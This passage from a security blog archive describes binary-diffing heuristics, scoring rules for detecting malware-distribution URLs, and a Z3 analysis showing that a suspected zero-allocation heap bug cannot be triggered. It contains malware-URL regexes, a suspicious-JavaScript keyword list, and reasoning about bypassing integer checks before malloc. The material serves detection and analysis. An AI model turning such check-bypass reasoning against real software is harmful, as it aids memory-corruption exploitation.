<strong><span class="T1">Same high complexity, prototype and names</span></strong><span class="T3">. The cyclomatic complexity is at least 20, and the prototype and the true names used in the function are the same for both databases.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Same high complexity and names</span></strong><span class="T3">. Same as before but ignoring the function’s prototype.</span><span class="odfLiEnd"> </span>
</p>
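
The small-primes-product (SPP) idea mentioned for the “Pseudo-code fuzzy AST hash” heuristic can be sketched as follows. This is only an illustration and not Diaphora’s actual code: the feature names and the `PrimeTable` helper are hypothetical. Each distinct feature gets its own prime and the hash is the product of those primes, so re-ordering the features does not change the result while adding or removing one does.

```python
from itertools import count


def primes():
    """Yield 2, 3, 5, ... by trial division (enough for a small feature table)."""
    found = []
    for n in count(2):
        if all(n % p for p in found):
            found.append(n)
            yield n


class PrimeTable:
    """Hypothetical helper: hands out one prime per distinct feature."""

    def __init__(self):
        self._gen = primes()
        self._by_feature = {}

    def prime_for(self, feature):
        if feature not in self._by_feature:
            self._by_feature[feature] = next(self._gen)
        return self._by_feature[feature]


def spp_hash(features, table):
    """Multiply the primes of all features; multiplication ignores ordering."""
    product = 1
    for feature in features:
        product *= table.prime_for(feature)
    return product


table = PrimeTable()
original = ["if", "call", "assign", "return"]
reordered = ["call", "if", "assign", "return"]   # same constructs, new order
different = ["if", "call", "call", "return"]     # one construct changed

print(spp_hash(original, table) == spp_hash(reordered, table))
print(spp_hash(original, table) == spp_hash(different, table))
```

Because multiplication is commutative, the first comparison holds and the second does not, which is why this kind of hash tolerates re-ordered constructs.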
## <span class="T3">Unreliable matches</span> {.Heading_20_2}
* <p class="P12">
<strong><span class="T1">Bytes hash</span></strong><span class="T3">. The first byte of each instruction is the same for both functions. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Nodes, edges, complexity and mnemonics</span></strong><span class="T3">. The number of basic blocks, relations, the cyclomatic complexity (naturally) and the mnemonics are the same. It can match functions too similar that actually perform opposite operations (like add_XXX and sub_XXX). Besides, this is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Nodes, edges, complexity and prototype</span></strong><span class="T3">. Same as before but the mnemonics are ignored and only the true names used in both functions are considered. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Nodes, edges, complexity, in-degree and out-degree</span></strong><span class="T3">. The number of basic blocks, edges, cyclomatic complexity (naturally), the number of functions calling it and the number of functions called from both functions are the same. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Nodes, edges and complexity</span></strong><span class="T3">. Same number of nodes, edges and, naturally, cyclomatic complexity values. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Similar pseudo-code</span></strong><span class="T3">. The pseudo-codes are considered similar with a confidence ratio of 0.58 or less. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Same high complexity</span></strong><span class="T3">. Both functions have the same high cyclomatic complexity, of at least 50. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
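
Several of these heuristics say that the cyclomatic complexity is “naturally” the same. A minimal sketch of why, assuming the usual single-function formula M = E - N + 2 (the node and edge names below are made up for the example): the value depends only on the number of nodes and edges, so equal counts imply an equal complexity.

```python
def cyclomatic_complexity(nodes, edges):
    """McCabe's formula for one connected control flow graph: E - N + 2."""
    return len(edges) - len(nodes) + 2


# Hypothetical CFG of a function with a single if/else.
nodes = ["entry", "then", "else", "exit"]
edges = [
    ("entry", "then"),
    ("entry", "else"),
    ("then", "exit"),
    ("else", "exit"),
]

print(cyclomatic_complexity(nodes, edges))
```

For this if/else graph the formula gives 4 - 4 + 2 = 2, that is, two independent paths through the function.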
## <span class="T3">Experimental (and likely to be removed or moved or changed in the future):</span> {.Heading_20_2}
* <p class="P12">
<strong><span class="T1">Similar small pseudo-code</span></strong><span class="T3">. The pseudo-code generated by the Hex-Rays decompiler is 5 lines long or less and is the same for both functions. It matches too many things and the calculated confidence ratio is typically bad.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Small pseudo-code fuzzy AST hash</span></strong><span class="T3">. Same as “Pseudo-code fuzzy AST hash” but applied to functions with 5 or fewer lines of pseudo-code. Like the previous heuristic, it matches too many things and the calculated confidence ratio is typically bad.</span>
</p>
* <p class="P12">
<strong><span class="T1">Similar small pseudo-code</span></strong><span class="T3">. Even worse than “</span><span class="T1">Similar small pseudo-code</span><span class="T3">”, as it tries to match similar functions with 5 or fewer lines of pseudo-code, matching almost anything and getting confidence ratios of 0.25 if you are lucky.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Equal small pseudo-code</span></strong><span class="T3">. Even worse than before, as it matches functions with the same pseudo-code when it is 5 or fewer lines of code long. Typically, you can get 2 or 3 results that are, actually, wrong.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Same low complexity, prototype and names</span></strong><span class="T3">. The prototype of the functions, the true names used in the functions and their cyclomatic complexity, which is less than 20, are the same. It worked for me once, I think.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Same low complexity and names</span></strong><span class="T3">. The cyclomatic complexity, which is less than 20, and the true names used in the function are the same. It typically matches functions already matched by other heuristics, so its usefulness is really limited.</span><span class="odfLiEnd"> </span>
</p>
## Conclusions {.Heading_20_2}
The plugin is not 100% public yet as it’s finishing its last BETA stage. However, if you’re interested in testing it out before I make it totally public, just send me an [e-mail](http://joxeankoret.com/contact.html) and I will send you the current Release Candidate 1 😉
And that’s all for now! I hope you like this plugin and this blog entry 😉
Cheers!
</hash></span></p>joxeanUPDATE: The plugin is now published in GitHub.Heuristics to detect malware distributed via Web2014-08-19T20:11:01+02:002014-08-19T20:11:01+02:00http://joxeankoret.com/blog/2014/08/19/heuristics-to-detect-malware-distributed-via-web<p>Two years ago I started a project, for fun, to try to catch as much malware and URLs related to malware as possible. I have written about <a href="http://joxeankoret.com/blog/2012/08/25/finding-malware-spam-in-twitter/">this</a> <a href="http://joxeankoret.com/blog/2013/01/26/malware-urls/">before</a>. In this post I’ll explain the heuristics I use for trying to classify URLs as malicious with “Malware Intelligence” (the name of the system that generates the daily <a href="http://malwareurls.joxeankoret.com">Malware URLs feed</a>). What a normal user sees in any of the 2 text files offered are simply domains or URLs that I classified as “malicious”. But, how does “Malware Intelligence” classifies them as malicious? What heuristics, techniques, etc… does it use?</p>
<!--more-->
<p><strong>Malware Intelligence</strong></p>
<p>The server processes in Malware Intelligence take URLs from many sources for later analysis. Some sources are public and others are not. Each URL is put in a queue and, from time to time, a process called “URLAna” performs some checks to determine if the URL seems to be malicious or not. URLAna calls smaller tools that each return a score: a score bigger than 0 means that something was found; a score of 0 means that nothing bad was found. If, after running each mini-tool against the URL or domain, the total score is bigger than 4, the URL is considered “malicious”. I do not use negative scores at all because I consider them a bad idea (for this project).</p>
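<p>The scoring loop described above could look roughly like the following sketch. It is not URLAna’s real code: the two checks, their names and the example domains are hypothetical stand-ins, and only the “sum the positive scores and compare against 4” logic comes from the text.</p>

```python
from urllib.parse import urlparse

THRESHOLD = 4  # a URL is "malicious" only if its total score is bigger than this

# Hypothetical data used by the two stand-in checks below.
KNOWN_DOMAINS = {"example.com"}
BLACKLISTED_DOMAINS = {"bad.test"}


def unknown_domain(url):
    """Return 1 when the host is not in the table of known domains."""
    return 0 if urlparse(url).hostname in KNOWN_DOMAINS else 1


def blacklist_lookup(url):
    """Stand-in for a 3rd party service that scores 4 on a hit."""
    return 4 if urlparse(url).hostname in BLACKLISTED_DOMAINS else 0


def classify(url, checks, threshold=THRESHOLD):
    """Run every check, add up the scores and compare with the threshold."""
    hits = {}
    for name, check in checks.items():
        score = check(url)
        if score > 0:  # a score of 0 means nothing was found
            hits[name] = score
    total = sum(hits.values())
    return total > threshold, total, hits


CHECKS = {"unknown_domain": unknown_domain, "blacklist": blacklist_lookup}

for candidate in ("http://bad.test/bot.exe", "http://unknown.test/", "http://example.com/"):
    print(candidate, classify(candidate, CHECKS))
```

<p>Note that with a threshold of “bigger than 4” no single check in this sketch is enough on its own: a 4 point hit still needs at least one more point from another check.</p>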
<p>Both hourly and daily, statistics are gathered about the number of URLs detected, when, how, etc… These statistics and many more features can be seen in the (private) Malware Intelligence’s web page. Let’s see one graphic from the statistics web page about the number of URLs classified as malicious by each heuristic before actually explaining them:</p>
<p><a href="http://joxeankoret.com/wp-content/uploads/2014/08/heur_stats.png"><img class="size-full wp-image-12570" src="http://joxeankoret.com/wp-content/uploads/2014/08/heur_stats.png" alt="Heuristics statistics" /></a></p>
<p class="wp-caption-text">
Statistics for each heuristic used by the Malware Intelligence’s process URLAna.
</p>
<p><strong>Unknown domain</strong></p>
<p>As we can see in the picture, the heuristic that catches the most bad URLs is “Unknown domain”: typically ~60% of URLs. This heuristic simply does the following:</p>
<ul>
<li>Download the Alexa’s Top 1 Million domains and save them to a database.</li>
<li>Add (but do not delete) new domains daily.</li>
<li>Possible false positives and manually excluded domains also go into this table.</li>
<li>When URLAna calls this process I simply check if the domain is in this daily updated table. If it isn’t, I consider it “suspicious” and give back a score of 1.</li>
</ul>
<p>This heuristic doesn’t say that anything is bad. It simply says that “this is unknown and could be bad”. However, in my experience, blocking domains outside the Alexa’s Top 1 Million blocks more than 60% of distributed malware.</p>
<p>And, well, this is how I can “detect” more than half of the malicious URLs Malware Intelligence processes daily. Let’s continue with the next high scoring heuristic: “Third party services”.</p>
<p><strong>Third party services</strong></p>
<p>This heuristic uses 3rd party services, as it’s clear from its name. Namely, the following:</p>
<ol>
<li><a href="http://www.surbl.org/">Surbl</a>: Extracted from their website: “<span style="color: #000000;">SURBLs are lists of </span><cite style="color: #000000;">web sites</cite><span style="color: #000000;"> that have appeared in unsolicited messages</span>”. This service offers an API I use to check if the domain is “bad”. If Surbl reports “something” about the URL, a score of 1 is added to the URL.</li>
<li><a href="http://www.spamhaus.org/">SpamHaus</a>: This is a well known service for downloading long lists of known spammers but, also, they add to the lists malware domains. As with Surbl, it exports an API that I use to check if the domain is considered “bad”. If so, it scores +1.</li>
<li><a href="https://developers.google.com/safe-browsing/">Google Safe Browsing</a>: This is a Google project that lets you check if a URL or domain is/was considered bad by their own automated malware analysis systems. As with the previous cases, they export an API that I make use of. However, GSB is more focused on malware than on spam and, as such, I directly add a score of 4 points if GSB says that something was found for that URL.</li>
</ol>
<p>And that’s all about this easy to implement mini tool. This heuristic is the 2nd one in number of malicious URLs detected. However, compare the percentages: the “unknown domain” rule detects ~60% of malicious URLs, this one ~15%. Notice the difference? Each time you add a new heuristic to detect more malicious URLs you will discover that the amount of work required to catch only a few more is huge (and I’m ignoring the fact that there is actually <strong>a lot of work</strong> behind all these 3 services). Don’t believe me? Let’s continue seeing more heuristics, some rather easy and others not <em>that</em> easy, and comparing the results…</p>
<p><strong>Obfuscated domain (or URL)</strong></p>
<p>The 3rd one on the podium is this rule. It’s as simple as the following: if the URL or the domain is obfuscated, then its score is increased by 1. Simple, isn’t it? Yes, as soon as you have defined “what is obfuscated” and coded it. In my case, I simply make use of 2 not so complex rules:</p>
<ol>
<li>If there are more than 6 continuous vowels or consonants, I consider it obfuscated. In either the domain, sub-domain or in the URI.</li>
<li>For domains longer than 8 characters: take the smaller of the two counts (vowels or consonants), multiply it by 3 and add 2; if the result is lower than the other count, I consider it malicious.</li>
</ol>
<p>Complicated? Not so complex when you have 40 million known bad URLs to test with. Hard at first: this is one of the first heuristics I added and one of those I modified the most. At first. Why? Let’s take a look at one good URL from Google:</p>
<p>https://chrome.google.com/webstore/detail/web-developer/bfbameneiokkgbdmiekhjnmfkcnldhhm</p>
<p>This (damn) URL is the link for the Web Developer extension for Chrome. One question: do you consider this URL obfuscated or not? I would say yes. Is it malicious? No.</p>
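<p>A minimal sketch of the two obfuscation rules, applied to the Chrome URL above. Several details are my assumptions and not taken from the original tool: only ASCII letters are counted, “y” is treated as a consonant, any non-letter character breaks a run, and rule 2 is applied to the whole host name.</p>

```python
from urllib.parse import urlparse

VOWELS = set("aeiou")


def longest_run(text):
    """Length of the longest run of consecutive vowels or of consecutive consonants."""
    best = run = 0
    prev_kind = None
    for ch in text.lower():
        if "a" <= ch <= "z":
            kind = "vowel" if ch in VOWELS else "consonant"
        else:
            kind = None  # digits, dots, slashes... break the run
        if kind is None:
            run = 0
        elif kind == prev_kind:
            run += 1
        else:
            run = 1
        prev_kind = kind
        best = max(best, run)
    return best


def is_unbalanced(domain):
    """Rule 2: min(vowels, consonants) * 3 + 2 is lower than the other count."""
    if len(domain) <= 8:
        return False
    letters = [c for c in domain.lower() if "a" <= c <= "z"]
    vowels = sum(c in VOWELS for c in letters)
    consonants = len(letters) - vowels
    return min(vowels, consonants) * 3 + 2 < max(vowels, consonants)


def looks_obfuscated(url):
    """Rule 1 on the host and on the path, rule 2 on the host only."""
    parsed = urlparse(url)
    host = parsed.hostname or ""
    return longest_run(host) > 6 or longest_run(parsed.path) > 6 or is_unbalanced(host)


chrome_url = ("https://chrome.google.com/webstore/detail/web-developer/"
              "bfbameneiokkgbdmiekhjnmfkcnldhhm")
print(looks_obfuscated(chrome_url))
print(looks_obfuscated("http://www.google.com/"))
```

<p>With these assumptions the extension identifier contains a run of 14 consecutive consonants, so the perfectly good Chrome URL is flagged, which is exactly the kind of false positive that forced me to tune the rule.</p>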
<p><strong>Content analysis: packed file</strong></p>
<p>The 4th heuristic at the top is this one. This heuristic, only applied to PE and ELF files, analyses the program with <a href="http://pyew.googlecode.com">Pyew</a> (by the way, a URL pointing directly to a program automatically scores +1) and determines if it’s:</p>
<ol>
<li>Packed.</li>
<li>Packed and obfuscated.</li>
</ol>
<p>Pyew already has one of these heuristics implemented (the obfuscation related one). The other heuristic is implemented (only for PE files) by the Python library <a href="https://code.google.com/p/pefile/">pefile</a>, by Ero Carrera. There is no magic here: a somewhat “big” binary with very few functions, or with code that produces too many errors when analysed and still has one, a few or even no detected functions at all, is considered probably bad. If the application is “packed”, its score is increased by 1. If it’s obfuscated, by 2. However, this heuristic, the one that tries to detect obfuscation (and anti-emulation, etc…), catches only ~50 files per day. Do you want to enhance it to also detect anti-disassembling, for example? Perhaps you will get 51 files per day. It may be that my heuristic is bad, but I would not recommend spending too much time on it.</p>
<p><strong>ClamAV found malware</strong></p>
<p>As simple as it sounds: ClamAV found malware in the contents of that URL. That’s all, it simply adds 3 points to the total score in case something was found. I use the Python bindings for ClamAV called <a href="https://pypi.python.org/pypi/pyClamd/">pyclamd</a>. I could use more AV engines/products. Or perhaps a lot of them. Or perhaps another 3rd party “free” service like <a href="https://www.metascan-online.com/">OpSwat Metascan</a> (or <a href="http://www.virustotal.com">VirusTotal</a>, which is better) but… how many URLs are detected this way? A good number of them, but not that many. Do you want to also add false positives from more than one AV vendor? I don’t. But this is only my opinion.</p>
<p><strong>Similar malware</strong></p>
<p>This heuristic uses a set of algorithms to cluster unknown malware executables (PE &amp; ELF). It uses Pyew and the algorithms implemented in Pyew’s tool <a href="https://code.google.com/p/pyew/source/browse/gcluster.py">gcluster</a>. If the file (contents) under analysis is an executable file and, via these graph based malware clusterization algorithms, it looks too similar (or equal) to previously known malware, I add 3 points to the score of the URL. &lt;SPAM&gt;Similar but newer and more advanced algorithms were implemented in the <a href="https://camal.coseinc.com">CAMAL</a> <a href="https://camal.coseinc.com/publish/cluster_kryptik_one_not_detected.html">clustering</a> <a href="https://camal.coseinc.com/publish/cluster_infected_goodware.html">engine</a>, a commercial product&lt;/SPAM&gt;.</p>
<p>While this heuristic is working, take a look at the percentage of new malware URLs discovered: 3.5% of the total. A lot of work for just 3.5%. Maybe it’s a problem of my algorithms, I don’t know. But… I don’t think so.</p>
<p><strong>Similar domain</strong></p>
<p>A rather simplistic heuristic, even if it doesn’t seem so: if the domain looks too similar to one domain in the first 100,000 records of the Alexa’s Top 1 Million, the score is increased by 1. Why? What about a domain named yutuve? What about guugle? They are likely being used in a phishing campaign or distributing malware.</p>
<p>At first the heuristic used a pure Python implementation of the <a href="https://pypi.python.org/pypi/soundex/1.0">soundex algorithm</a>. After a while I switched to the SOUNDEX function in MySQL. Results of this heuristic: 3.3%. At least it wasn’t that hard to implement…</p>
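<p>To show why Soundex catches names like yutuve or guugle, here is a small sketch of the classic American Soundex. It is neither the PyPI module nor MySQL’s SOUNDEX (which is not guaranteed to produce the same codes), and the helper that strips the TLD is a hypothetical simplification.</p>

```python
# Letter groups of the classic American Soundex.
CODES = {}
for letters, digit in (("bfpv", "1"), ("cgjkqsxz", "2"), ("dt", "3"),
                       ("l", "4"), ("mn", "5"), ("r", "6")):
    for letter in letters:
        CODES[letter] = digit


def soundex(word):
    """Return the 4 character Soundex code of a word ("" if it has no letters)."""
    letters = [c for c in word.lower() if c.isalpha()]
    if not letters:
        return ""
    encoded = letters[0].upper()
    prev = CODES.get(letters[0], "")
    for ch in letters[1:]:
        code = CODES.get(ch, "")
        if code and code != prev:
            encoded += code
        if ch not in "hw":  # 'h' and 'w' do not separate equal codes
            prev = code
    return (encoded + "000")[:4]


def sounds_like(domain, known_domain):
    """Hypothetical helper: compare only the first label of each domain."""
    return soundex(domain.split(".")[0]) == soundex(known_domain.split(".")[0])


print(soundex("yutuve"), soundex("youtube"))
print(soundex("guugle"), soundex("google"))
print(sounds_like("yutuve.com", "youtube.com"))
```

<p>Both fake names get the same code as the domain they imitate, while an unrelated name does not, so a single comparison per known domain is enough.</p>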
<p><strong>All the other heuristics</strong></p>
<p>There are 2 other heuristics that I implemented and still use but do not maintain, and I have no interest in maintaining them at all:</p>
<ol>
<li>Suspicious JavaScript. Basically, a pattern matching technique looking for “eval”, “document.write”, “setInterval”, “unescape”, etc… If the patterns are discovered the score is increased by 1. I decided not to lose time adding more “advanced” malicious JavaScript heuristics. The reason? Because it would require a lot of work that must be updated daily. Too much work for a “just for fun” project.</li>
<li>Known bad URL parameter. Pattern matching, again. For some time I had a system to group and extract some of the most common special URL parameters and file names and then use them as another piece of evidence. I do not maintain this list any more for the same reasons as the previous heuristic. If you want to see some examples: the rules “/bot.exe” or “/.*(update|install).*flash.*player.*.exe” were the ones finding the most samples.</li>
</ol>
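<p>The “known bad URL parameter” idea boils down to running a list of regular expressions against the URL path. A small sketch using only the two rules quoted above (the function name and the test URLs are hypothetical, and the rules are used verbatim, so the dot still matches any character):</p>

```python
import re
from urllib.parse import urlparse

# The two example rules from the list above, compiled as-is.
RULES = [
    re.compile(r"/bot.exe"),
    re.compile(r"/.*(update|install).*flash.*player.*.exe"),
]


def matches_known_bad_rule(url):
    """Return True if the path of the URL matches any of the rules."""
    path = urlparse(url).path
    return any(rule.search(path) for rule in RULES)


for candidate in ("http://example.test/bot.exe",
                  "http://example.test/dl/install_flash_player.exe",
                  "http://example.test/index.html"):
    print(candidate, matches_known_bad_rule(candidate))
```

<p>The hard part is not the matching itself but keeping the list of rules up to date, which is why I stopped maintaining it.</p>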
<p><strong>Conclusions and possible future work</strong></p>
<p>Detecting malicious content is not easy and requires a lot of work. Detecting more than 50% of the (dumb) malicious URLs and samples is easy. Detecting more than 70% is a lot of work. Detecting something close to 75% requires, in my very subjective opinion, more effort than what you spent on detecting all the previous 70% of samples. If you ever blamed $AV for not detecting this or that relatively new malware sample, please think about all the work that must be done to catch that new family.</p>
<p>As for possible future improvements of Malware Intelligence, if any, I’m thinking about integrating one more tool of mine: <a href="https://github.com/joxeankoret/multiav">MultiAV</a>. It’s a simple interface to various AV products using the command line scanners to get the detections for a file, directory, etc… Also, I have other heuristics in mind, but none of them is easy and this is a project that I work on during my spare time when I feel like spending some hours on it.</p>
<p>The source code for URLAna, as an independent tool, will be published (once I clean it up and all the code specific to my system is removed) in the coming months (when I have time). In any case, with all the details given in this blog post one can implement it (surely better than my prototype-that-grew-a-lot) easily.</p>
<p>I hope you liked this post and that you find it useful. Perhaps it may even help you improve your analysis systems, or you can borrow some ideas for another project 😉 Also, if you have any idea to improve that system I would be very happy to read/hear about it 🙂</p>
<p>Cheers!</p>
<p> </p>joxeanTwo years ago I started a project, for fun, to try to catch as much malware and URLs related to malware as possible. I have written about this before. In this post I’ll explain the heuristics I use for trying to classify URLs as malicious with “Malware Intelligence” (the name of the system that generates the daily Malware URLs feed). What a normal user sees in any of the 2 text files offered are simply domains or URLs that I classified as “malicious”. But, how does “Malware Intelligence” classifies them as malicious? What heuristics, techniques, etc… does it use?A vulnerability that was not2014-05-02T08:34:07+02:002014-05-02T08:34:07+02:00http://joxeankoret.com/blog/2014/05/02/a-vulnerability-that-wasnt<p>This is a history of fail. I was analysing a piece of code, in assembly, that I thought would be vulnerable to a zero allocation bug allowing me to overwrite some bytes of heap space (overwriting a structure with many function pointers!). However, after spending like 2 hours analysing statically the “bug”, and documenting it, I finally discovered it wasn’t vulnerable. #Fail.</p>
<!--more-->
<p><strong>The “vulnerable” code</strong></p>
<p>The “vulnerability” I was analysing (that wasn’t a bug finally) was something, stripping non interesting parts, like this one:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">// The not really vulnerable code</span>
<span class="kt">void</span> <span class="nf">foo</span><span class="p">(</span><span class="kt">int</span> <span class="n">x</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)(</span><span class="n">x</span> <span class="o">-</span> <span class="mi">69</span><span class="p">)</span> <span class="o">></span> <span class="mh">0x63FFFBB</span> <span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Can I force here a zero allocation?</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">x</span> <span class="o">+</span> <span class="mi">68</span><span class="p">);</span>
<span class="c1">// Then overwrite heap memory here...</span>
<span class="p">}</span></code></pre></figure>
<p>Taking a brief look: do you think it’s exploitable? Well, at first I thought so, but it isn’t. The 1st check is unsigned, and there is no number we can craft that, after subtracting 69, is less than or equal to 0x63fffbb and that, at the same time, gives zero after adding 68. The best way of proving it: using an SMT solver.</p>
<p><strong>The Z3 SMT Solver</strong></p>
<p>An SMT solver is a tool to solve <a href="http://en.wikipedia.org/wiki/Satisfiability_Modulo_Theories#SMT_solvers">Satisfiability Modulo Theories</a> problems. The best one I know is <a href="http://z3.codeplex.com/">Z3</a>, which is half open source (the code is open but you cannot use it for commercial purposes). Using an SMT solver like Z3 I would have solved that problem (the probable exploitability of the previous code) in less than 1 minute, but I decided it was better to lose 2 hours of my time analysing a non-existent bug… In the following lines I will explain how to set up Z3 and use the Python bindings to check whether it’s possible to force a zero allocation with this code.</p>
<p><strong>Setting up Z3 and the Python bindings</strong></p>
<p>We first need to download the Z3 code:</p>
<pre>git clone https://git01.codeplex.com/z3</pre>
<p>This will download a zip file with all the Z3 code (I don’t know why Microsoft did this..). We need to unpack the downloaded zip file and, after that, execute the following commands (for building it in Linux):</p>
<pre>$ autoconf
$ ./configure
$ make
</pre>
<p>This will make the Z3 binary. Now, we need the Z3 dynamic library as it will be used by the Python bindings. We get it by issuing the following command:</p>
<pre>$ make so</pre>
<p>Now we will have the libz3.so library in the path <strong>$CUR_DIR/bin/external/libz3.so</strong>. We need to set the environment variable LD_LIBRARY_PATH to point to this directory or just copy the library to /usr/lib or /usr/local/lib. Whichever you choose, after this step you will be able to run the Z3 Python bindings. You can try it by running the example named “example.py” provided with the Z3 source code:</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">from</span> <span class="nn">z3</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">x</span> <span class="o">=</span> <span class="n">Real</span><span class="p">(</span><span class="s">'x'</span><span class="p">)</span>
<span class="n">y</span> <span class="o">=</span> <span class="n">Real</span><span class="p">(</span><span class="s">'y'</span><span class="p">)</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">Solver</span><span class="p">()</span>
<span class="n">s</span><span class="p">.</span><span class="n">add</span><span class="p">(</span><span class="n">x</span> <span class="o">+</span> <span class="n">y</span> <span class="o">></span> <span class="mi">5</span><span class="p">,</span> <span class="n">x</span> <span class="o">></span> <span class="mi">1</span><span class="p">,</span> <span class="n">y</span> <span class="o">></span> <span class="mi">1</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">check</span><span class="p">())</span>
<span class="k">print</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">model</span><span class="p">())</span></code></pre></figure>
<pre>$ python example.py
sat
[y = 2, x = 4]
</pre>
<p><strong>Writing an equation to solve our problem</strong></p>
<p>The provided example for the Z3 bindings is just too simple for us. If we try to abstract our problem using only the information given by this example, changing from Real to Int, it will say that the problem is solvable, but we would be expressing it wrongly. A normal “integer” in maths is not the same as an integer for computers: if we add 1 to 0xFFFFFFFF we will get the number 0x100000000 but, for a computer, it will actually have the value 0x0 (for a 32bit integer). So, instead of using Real or Int, we need to use what is called a “Bit vector”. A bit vector of 32bits is actually what we want. So let’s abstract the predicates of the previous C code and write our first equation with the Z3 bindings for Python:</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="o">>>></span> <span class="kn">from</span> <span class="nn">z3</span> <span class="kn">import</span> <span class="o">*</span> <span class="c1"># Import the Z3 stuff
</span><span class="o">>>></span>
<span class="o">>>></span> <span class="n">x</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s">'x'</span><span class="p">,</span> <span class="mi">32</span><span class="p">)</span> <span class="c1"># Create a bit vector of 32bits
</span><span class="o">>>></span> <span class="n">s</span> <span class="o">=</span> <span class="n">Solver</span><span class="p">()</span>
<span class="o">>>></span> <span class="n">s</span><span class="p">.</span><span class="n">add</span><span class="p">(</span><span class="n">x</span><span class="o">-</span><span class="mi">68</span> <span class="o"><=</span> <span class="mh">0x63fffbb</span><span class="p">,</span> <span class="n">x</span><span class="o">+</span><span class="mi">68</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="c1"># Add our equation
</span><span class="o">>>></span> <span class="n">s</span><span class="p">.</span><span class="n">check</span><span class="p">()</span> <span class="c1"># And check if it's satisfiable
</span><span class="n">sat</span></code></pre></figure>
<p>So, according to Z3 and the equation we fed to it, it’s solvable! We can get a valid ‘x’ solution for it calling <strong>s.model()</strong>:</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="o">>>></span> <span class="n">s</span><span class="p">.</span><span class="n">model</span><span class="p">()</span>
<span class="p">[</span><span class="n">x</span> <span class="o">=</span> <span class="mi">4294967228</span><span class="p">]</span>
<span class="o">>>></span> <span class="nb">hex</span><span class="p">(</span><span class="mi">4294967228</span><span class="p">)</span>
<span class="s">'0xffffffbc'</span></code></pre></figure>
<p>OK. According to Z3 the value 0xffffffbc would pass both checks, thus, making a zero allocation. However, the equation we wrote is wrong. Why? Because the following comparison is unsigned and we’re making a signed comparison here:</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="n">unsigned</span> <span class="nb">int</span><span class="p">)(</span><span class="n">x</span> <span class="o">-</span> <span class="mi">69</span><span class="p">)</span> <span class="o">></span> <span class="mh">0x63FFFBB</span> <span class="p">)</span></code></pre></figure>
<p>For making an unsigned comparison we need to change the equation to the following one:</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">s</span><span class="p">.</span><span class="n">add</span><span class="p">(</span><span class="n">ULE</span><span class="p">(</span><span class="n">x</span><span class="o">-</span><span class="mi">68</span><span class="p">,</span> <span class="mh">0x63fffbb</span><span class="p">),</span> <span class="n">x</span><span class="o">+</span><span class="mi">68</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span></code></pre></figure>
<p>The function “ULE” performs an <strong>u</strong>nsigned <strong>l</strong>ess or <strong>e</strong>qual comparison. If we now run our final code:</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="o">>>></span> <span class="kn">from</span> <span class="nn">z3</span> <span class="kn">import</span> <span class="o">*</span>
<span class="o">>>></span> <span class="n">x</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s">'x'</span><span class="p">,</span> <span class="mi">32</span><span class="p">)</span>
<span class="o">>>></span> <span class="n">s</span> <span class="o">=</span> <span class="n">Solver</span><span class="p">()</span>
<span class="o">>>></span> <span class="n">s</span><span class="p">.</span><span class="n">add</span><span class="p">(</span><span class="n">ULE</span><span class="p">(</span><span class="n">x</span><span class="o">-</span><span class="mi">68</span><span class="p">,</span> <span class="mh">0x63fffbb</span><span class="p">),</span> <span class="n">x</span><span class="o">+</span><span class="mi">68</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="o">>>></span> <span class="n">s</span><span class="p">.</span><span class="n">check</span><span class="p">()</span>
<span class="n">unsat</span></code></pre></figure>
<p>We will discover that forcing a zero allocation with the 1st check is *NOT* possible, as the comparison is unsigned. It would be possible, though, if the comparison were a signed one.</p>
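<p>The difference between both results can also be checked by hand, without Z3. The following is a minimal sketch in plain Python that emulates 32-bit arithmetic, assuming the first (wrong) equation used the plain <code>&lt;=</code> operator, which Z3's Python API treats as a signed comparison for bit-vectors. The helper names (<code>to_signed32</code>, <code>passes_signed</code>, <code>passes_unsigned</code>, <code>zero_allocation</code>) are made up for this illustration:</p>

```python
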